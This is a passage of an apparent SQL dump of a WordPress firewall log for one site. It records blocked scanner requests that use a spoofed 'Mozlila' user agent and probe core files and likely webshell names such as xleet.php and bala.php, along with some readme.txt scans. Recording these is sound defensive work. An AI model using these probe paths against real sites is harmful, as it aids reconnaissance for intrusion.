Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXBsdWdpbi11cGdyYWRlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133370,1699888629.155122,1699888629.146200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-plugin-install-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-plugin-install-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXBsdWdpbi1pbnN0YWxsLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133369,1699888629.488941,1699888629.480100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-plugins-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-plugins-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXBsdWdpbnMtbGlzdC10YWJsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133215,1699888690.071021,1699888690.061900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/pridmag/','http://eckankar-colorado.org/wp-content/themes/pridmag/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3ByaWRtYWcv\",\"category\":\"brute-force\",\"ssl\":1}'),(133216,1699888689.738183,1699888689.729300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/wp-pridmag/','http://eckankar-colorado.org/wp-content/themes/wp-pridmag/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3dwLXByaWRtYWcv\",\"category\":\"brute-force\",\"ssl\":1}'),(133259,1699888673.627613,1699888673.618300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/PHPMailer.php','http://eckankar-colorado.org/wp-includes/PHPMailer/PHPMailer.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci9QSFBNYWlsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133261,1699888671.946920,1699888671.933100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/wlw/','http://eckankar-colorado.org/wp-includes/images/wlw/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy93bHcv\",\"category\":\"brute-force\",\"ssl\":1}'),(133262,1699888670.610043,1699888670.600800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/wp-includes/IXR/','http://eckankar-colorado.org/wp-includes/ID3/wp-includes/IXR/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy93cC1pbmNsdWRlcy9JWFIv\",\"category\":\"brute-force\",\"ssl\":1}'),(133396,1699888620.227124,1699888620.218200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-theme-installer-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-theme-installer-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXRoZW1lLWluc3RhbGxlci1za2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133144,1699888496.581306,1699888496.566300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-customize-setting.php','http://eckankar-colorado.org/wp-includes/class-wp-customize-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWN1c3RvbWl6ZS1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133160,1699888490.507920,1699888490.499200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-pattern-categories-registry.php','http://eckankar-colorado.org/wp-includes/class-wp-block-pattern-categories-registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhdHRlcm4tY2F0ZWdvcmllcy1yZWdpc3RyeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133161,1699888490.160097,1699888490.151400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-parser.php','http://eckankar-colorado.org/wp-includes/class-wp-block-parser.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXBhcnNlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134317,1700050807.088985,1700050807.073800,0x00000000000000000000FFFF5F6FEAB8,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/all-404-redirect-to-homepage/wp-tloijfk.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hbGwtNDA0LXJlZGlyZWN0LXRvLWhvbWVwYWdlL3dwLXRsb2lqZmsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134312,1700049163.265809,1700049163.251700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xl2023.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsMjAyMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133516,1699888571.824965,1699888571.813500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Credit.php','http://eckankar-colorado.org/wp-includes/SimplePie/Credit.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DcmVkaXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134313,1700049160.090446,1700049160.068000,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xleet.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133517,1699888571.491446,1699888571.480200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Core.php','http://eckankar-colorado.org/wp-includes/SimplePie/Core.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Db3JlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134314,1700049288.991274,1700049288.982600,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lSN1N6cnNPVUVQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134315,1700050154.400317,1700050154.388600,0x00000000000000000000FFFF5B5CF6C1,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-extra/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1leHRyYS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1leHRyYS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134316,1700050154.399976,1700050154.388600,0x00000000000000000000FFFF5B5CF6C1,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-extra/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1leHRyYS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1leHRyYS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(133518,1699888571.034455,1699888571.025100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Copyright.php','http://eckankar-colorado.org/wp-includes/SimplePie/Copyright.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Db3B5cmlnaHQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134296,1700049280.577922,1700049280.568400,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/xl2023.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveGwyMDIzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134297,1700049275.481074,1700049275.472300,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133510,1699888573.877166,1699888573.868400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Locator.php','http://eckankar-colorado.org/wp-includes/SimplePie/Locator.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Mb2NhdG9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134318,1700062369.348734,1700062369.333400,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/bala.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2JhbGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134311,1700049169.693922,1700049169.674700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xxl.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3h4bC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133515,1699888572.165620,1699888572.156400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Enclosure.php','http://eckankar-colorado.org/wp-includes/SimplePie/Enclosure.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 